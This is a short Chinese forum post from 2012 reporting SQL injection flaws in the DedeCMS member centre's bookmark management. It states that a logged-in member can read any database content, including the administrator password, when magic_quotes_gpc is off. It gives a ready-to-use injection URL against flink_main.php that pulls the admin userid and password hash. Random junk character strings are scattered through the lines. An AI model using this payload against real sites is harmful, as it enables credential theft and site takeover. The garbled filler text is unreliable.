DedeCMS会员中心SQL注射漏洞: p7 w P3 c, J. _7 R
需要magic_quotes_gpc = Off7 q4 M5 C1 f% j, g
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码." e8 W, o# B9 q- v
/ S! E( |- S" j0 i% A
DedeCMS会员中心书签管理SQL注射漏洞* ~0 i/ A* h1 U
成功利用该漏洞可获得管理员密码
6 B& K% X' |3 I: { n) g5 t( h3 B/ O0 }
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
5 l3 u! p& L) n4 P1 f2 | 2 J; G: [( h0 z7 e0 o' T
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r) |% k b' g. Y+ P
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59